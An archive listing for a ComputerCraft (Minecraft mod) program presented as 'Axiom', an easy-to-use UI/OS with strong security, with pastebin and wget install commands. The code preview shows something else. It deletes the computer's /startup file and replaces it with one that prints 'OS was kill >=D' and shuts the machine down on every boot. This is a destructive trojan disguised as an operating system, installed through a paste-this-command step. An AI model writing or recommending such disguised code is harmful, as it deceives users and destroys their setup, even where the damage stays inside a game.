ComputerCraft Archive

Axiom - The easy to use UI/OS

computer operating-system unknown forum

Description

Axiom, now with desktop icons.Axiom is the way to go if you like having advanced things made simpler for you. Or simply love having top-notch security at the press of a button.Axiom has been carefully...

Installation

Copy one of these commands into your ComputerCraft terminal:

Pastebin:pastebin get f9LN6P9R axiom_-_the_easy_to_use_ui/os
wget:wget https://pastebin.com/raw/f9LN6P9R axiom_-_the_easy_to_use_ui/os
Archive:wget https://cc.shobie.xyz/cc/get/pb-f9LN6P9R axiom_-_the_easy_to_use_ui/os
Quick Install: wget https://cc.shobie.xyz/cc/get/pb-f9LN6P9R Axiom - The easy to use UI/OS

Usage

Run the program after downloading

Tags

forumoperating-systems

Source

View Original Source

Code Preview

fs.delete("/startup")

f = fs.open("/startup", "w")
f.write("term.clear() term.setCursorPos(1,1) print('error:startup:1: OS was kill >=D') sleep(7) os.shutdown()")